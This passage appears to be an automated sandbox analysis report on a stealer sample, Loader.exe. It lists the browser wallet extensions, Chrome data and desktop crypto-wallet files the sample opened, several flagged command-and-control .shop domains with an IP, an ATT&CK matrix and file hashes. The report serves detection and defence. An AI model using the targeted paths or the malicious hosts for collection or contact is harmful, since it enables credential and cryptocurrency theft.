            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: Yara matchFile source: 00000006.00000002.3527107091.0000000003235000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Loader.exe PID: 7888, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation
            1
            DLL Side-Loading
            211
            Process Injection
            2
            Virtualization/Sandbox Evasion
            1
            OS Credential Dumping
            1
            System Time Discovery
            Remote Services1
            Screen Capture
            21
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Native API
            Boot or Logon Initialization Scripts1
            DLL Side-Loading
            211
            Process Injection
            LSASS Memory31
            Security Software Discovery
            Remote Desktop Protocol1
            Archive Collected Data
            2
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            PowerShell
            Logon Script (Windows)Logon Script (Windows)11
            Deobfuscate/Decode Files or Information
            Security Account Manager2
            Virtualization/Sandbox Evasion
            SMB/Windows Admin Shares3
            Data from Local System
            113
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
            Obfuscated Files or Information
            NTDS1
            Application Window Discovery
            Distributed Component Object Model2
            Clipboard Data
            Protocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Software Packing
            LSA Secrets1
            File and Directory Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain Credentials43
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Loader.exe34%ReversingLabsWin32.Trojan.Generic
            Loader.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            fancywaxxers.shop100%Avira URL Cloudmalware
            https://fancywaxxers.shop/api100%Avira URL Cloudmalware
            https://fancywaxxers.shop/apim100%Avira URL Cloudmalware
            rabidcowse.shop100%Avira URL Cloudmalware
            noisycuttej.shop100%Avira URL Cloudmalware
            wholersorie.shop100%Avira URL Cloudmalware
            nearycrepso.shop100%Avira URL Cloudmalware
            cloudewahsj.shop100%Avira URL Cloudmalware
            https://fancywaxxers.shop:443/api4p.default-release/key4.dbPK100%Avira URL Cloudmalware
            https://fancywaxxers.shop/apitd100%Avira URL Cloudmalware
            framekgirus.shop100%Avira URL Cloudmalware
            https://fancywaxxers.shop/100%Avira URL Cloudmalware
            abruptyopsn.shop100%Avira URL Cloudmalware
            tirepublicerj.shop100%Avira URL Cloudmalware
            NameIPActiveMaliciousAntivirus DetectionReputation
            fancywaxxers.shop
            104.21.80.1
            truetrue
              unknown
              NameMaliciousAntivirus DetectionReputation
              fancywaxxers.shoptrue
              • Avira URL Cloud: malware
              unknown
              rabidcowse.shoptrue
              • Avira URL Cloud: malware
              unknown
              wholersorie.shoptrue
              • Avira URL Cloud: malware
              unknown
              cloudewahsj.shoptrue
              • Avira URL Cloud: malware
              unknown
              noisycuttej.shoptrue
              • Avira URL Cloud: malware
              unknown
              nearycrepso.shoptrue
              • Avira URL Cloud: malware
              unknown
              https://fancywaxxers.shop/apitrue
              • Avira URL Cloud: malware
              unknown
              framekgirus.shoptrue
              • Avira URL Cloud: malware
              unknown
              tirepublicerj.shoptrue
              • Avira URL Cloud: malware
              unknown
              abruptyopsn.shoptrue
              • Avira URL Cloud: malware
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://duckduckgo.com/chrome_newtabLoader.exe, 00000006.00000003.3490854232.00000000059CC000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000006.00000003.3490986660.00000000059CA000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://duckduckgo.com/ac/?q=Loader.exe, 00000006.00000003.3490854232.00000000059CC000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000006.00000003.3490986660.00000000059CA000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://ocsp.entrust.net03Loader.exefalse
                    high
                    http://ocsp.entrust.net02Loader.exefalse
                      high
                      https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.Loader.exe, 00000006.00000003.3521823674.0000000005989000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Loader.exe, 00000006.00000003.3490854232.00000000059CC000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000006.00000003.3490986660.00000000059CA000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://fancywaxxers.shop:443/api4p.default-release/key4.dbPKLoader.exe, 00000006.00000002.3527107091.0000000003235000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Loader.exe, 00000006.00000003.3493201418.00000000059DF000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000006.00000003.3508198690.00000000059D8000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000006.00000003.3508412726.00000000059D8000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000006.00000003.3493674605.00000000059D8000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiLoader.exe, 00000006.00000003.3521823674.0000000005989000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://x1.c.lencr.org/0Loader.exe, 00000006.00000003.3519855745.00000000059B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://x1.i.lencr.org/0Loader.exe, 00000006.00000003.3519855745.00000000059B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallLoader.exe, 00000006.00000003.3493674605.00000000059B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchLoader.exe, 00000006.00000003.3490854232.00000000059CC000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000006.00000003.3490986660.00000000059CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://fancywaxxers.shop/apimLoader.exe, 00000006.00000002.3527107091.0000000003235000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://crl.entrust.net/ts1ca.crl0Loader.exefalse
                                        high
                                        https://support.mozilla.org/products/firefoxgro.allLoader.exe, 00000006.00000003.3521344950.0000000005BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94Loader.exe, 00000006.00000003.3521823674.0000000005989000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgLoader.exe, 00000006.00000003.3521823674.0000000005989000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoLoader.exe, 00000006.00000003.3490854232.00000000059CC000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000006.00000003.3490986660.00000000059CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://fancywaxxers.shop/apitdLoader.exe, 00000006.00000002.3527107091.0000000003219000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://www.entrust.net/rpa03Loader.exefalse
                                                  high
                                                  http://aia.entrust.net/ts1-chain256.cer01Loader.exefalse
                                                    high
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Loader.exe, 00000006.00000003.3490854232.00000000059CC000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000006.00000003.3490986660.00000000059CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://crl.rootca1.amazontrust.com/rootca1.crl0Loader.exe, 00000006.00000003.3519855745.00000000059B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaLoader.exe, 00000006.00000003.3521823674.0000000005989000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://ocsp.rootca1.amazontrust.com0:Loader.exe, 00000006.00000003.3519855745.00000000059B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Loader.exe, 00000006.00000003.3493201418.00000000059DF000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000006.00000003.3508198690.00000000059D8000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000006.00000003.3508412726.00000000059D8000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000006.00000003.3493674605.00000000059D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.ecosia.org/newtab/Loader.exe, 00000006.00000003.3490854232.00000000059CC000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000006.00000003.3490986660.00000000059CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brLoader.exe, 00000006.00000003.3521344950.0000000005BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://ac.ecosia.org/autocomplete?q=Loader.exe, 00000006.00000003.3490854232.00000000059CC000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000006.00000003.3490986660.00000000059CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://crl.microLoader.exe, 00000006.00000002.3527107091.0000000003235000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgLoader.exe, 00000006.00000003.3521823674.0000000005989000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://support.microsofLoader.exe, 00000006.00000003.3493201418.00000000059E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://crt.rootca1.amazontrust.com/rootca1.cer0?Loader.exe, 00000006.00000003.3519855745.00000000059B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesLoader.exe, 00000006.00000003.3493674605.00000000059B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://fancywaxxers.shop/Loader.exe, 00000006.00000002.3527107091.000000000329E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Loader.exe, 00000006.00000003.3490854232.00000000059CC000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000006.00000003.3490986660.00000000059CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://crl.entrust.net/2048ca.crl0Loader.exefalse
                                                                                  high
                                                                                  https://www.entrust.net/rpa0Loader.exefalse
                                                                                    high
                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs
                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    104.21.80.1
                                                                                    fancywaxxers.shopUnited States
                                                                                    13335CLOUDFLARENETUStrue
                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1582076
                                                                                    Start date and time:2024-12-29 23:33:10 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 7m 4s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Run name:Run with higher sleep bypass
                                                                                    Number of analysed new started processes analysed:11
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:Loader.exe
                                                                                    Detection:MAL
                                                                                    Classification:mal100.troj.spyw.evad.winEXE@5/4@1/1
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 100%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 98%
                                                                                    • Number of executed functions: 30
                                                                                    • Number of non-executed functions: 153
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .exe
                                                                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                    • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45, 20.190.159.71
                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                    • VT rate limit hit for: Loader.exe
                                                                                    No simulations
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    104.21.80.1SW_48912.scr.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.dejikenkyu.cyou/pmpa/
                                                                                    SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                    • hiranetwork.com/administrator/index.php
                                                                                    downloader2.htaGet hashmaliciousXWormBrowse
                                                                                    • 2k8u3.org/wininit.exe
                                                                                    No context
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    CLOUDFLARENETUSBasesRow.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.64.1
                                                                                    dsoft.exeGet hashmaliciousPython Stealer, Creal StealerBrowse
                                                                                    • 104.26.13.205
                                                                                    setup.msiGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.0.151
                                                                                    installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.208.58
                                                                                    EFT Payment_Transcript__Survitecgroup.htmlGet hashmaliciousUnknownBrowse
                                                                                    • 104.18.26.193
                                                                                    @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.32.1
                                                                                    Lets-x64.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                    • 104.21.81.224
                                                                                    KL-3.1.16.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                    • 104.21.81.224
                                                                                    Whyet-4.9.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                    • 104.21.81.224
                                                                                    GPU-Z.exeGet hashmaliciousLummaC, DarkTortilla, LummaC StealerBrowse
                                                                                    • 172.67.190.234
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    a0e9f5d64349fb13191bc781f81f42e1BasesRow.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.80.1
                                                                                    installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.80.1
                                                                                    @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.80.1
                                                                                    GPU-Z.exeGet hashmaliciousLummaC, DarkTortilla, LummaC StealerBrowse
                                                                                    • 104.21.80.1
                                                                                    Winter.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.80.1
                                                                                    MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.80.1
                                                                                    rfWu0dUz6A.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.80.1
                                                                                    SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                                                                    • 104.21.80.1
                                                                                    gdi32.dllGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.80.1
                                                                                    Loader.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.80.1
                                                                                    No context
                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                    File Type:Mini DuMP crash report, 14 streams, Sun Dec 29 22:37:00 2024, 0x1205a4 type
                                                                                    Category:dropped
                                                                                    Size (bytes):34560
                                                                                    Entropy (8bit):1.7963415040398485
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:3s9eEusuQGQOTFAmYcSG1NwAC100YcaF:bviSTFAVGbO1j
                                                                                    MD5:5C207B5DDF484E5B2A1CB6CA2D2F2353
                                                                                    SHA1:39AEDA046E91BF3E470041E03C50BB4CAE6455AA
                                                                                    SHA-256:9A564FF0881FE2BCCBEA31602E608C1CF82FFD437C0B60FDB4111FFB6B2C7DFE
                                                                                    SHA-512:CB247B212F9F79A01D0D2CAE668F7586596A26A2053301085DD5E5C712A8F056A83181773822423122AB4336877D08B3E0825CCA9C6B43E5960FECA062403F16
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:MDMP..a..... .........qg........................<...........................T.......8...........T...........P....{......................................................................................................eJ......\.......GenuineIntel............T.......4...V.qg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):8318
                                                                                    Entropy (8bit):3.693532374815434
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:R6l7wVeJqZ6k6Y9nSUrgmfEyJoXprT89bymsfYmm:R6lXJk6k6YtSUrgmfEyJo+yFfA
                                                                                    MD5:92DABB31CBC27386F8F53C43BF1B8942
                                                                                    SHA1:D13C74EE611AC9D42E6249C6B117990C307B1C12
                                                                                    SHA-256:ABDED7FC5E62CF7EFC42BBE55ED4DAC14B483E740E59E9491CC2C6E986929350
                                                                                    SHA-512:00C58BC9FEEB47996D4CFD5FE73F245D2FCB1D6FAB37EBC4B26D570F7C0E44FC03F7159065D6C54C490D8DDD51322F1722E8E287A64AD739AEFFAFA2F48640F2
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.7.6.<./.P.i.
                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):4651
                                                                                    Entropy (8bit):4.448944068794669
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:cvIwWl8zsbJg77aI9YjWpW8VYZYm8M4JRXFJ+q86Qax5eAd:uIjf1I7eS7VRJJaax5Zd
                                                                                    MD5:262B406A374DB92D61AFF5F2F7E164A5
                                                                                    SHA1:CCDE5628704498E2405D1B9092F7DF66F56E4B17
                                                                                    SHA-256:8511988E22C206F0B80E9620A1DEBCF70BC93AE1F87853FAB64BACC9CBBAD0EF
                                                                                    SHA-512:723CE92725184DA7A3AFFE8CC6F2259E81EF7925E4F63C52EC3C47117FDAF0F49B5BB9709E0DDB3D763A695EF2560A3D05C6D3CE20C3AAC40BBBD1D40FC50163
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653139" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                    Process:C:\Users\user\Desktop\Loader.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):105882
                                                                                    Entropy (8bit):2.6415325072564495
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:EEEUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUl:O
                                                                                    MD5:AF5A4759082D5DE162C1DDBA2B49BED4
                                                                                    SHA1:B87A417B2E1EC7C5A6BFC4B21CD29F6A6CF22FB0
                                                                                    SHA-256:8478F859B96554C624564631794AE2FF91A64F3D354781B171F5139E0702F6D5
                                                                                    SHA-512:15C6E749259350A8A29F85292D69203C9B0852177F6081FC922F85606C21F5E0C7300E2C563CB4096E5A9FA787CB86A33737FA3632449F9FCA50BAE97931D924
                                                                                    Malicious:false
                                                                                    Reputation:low
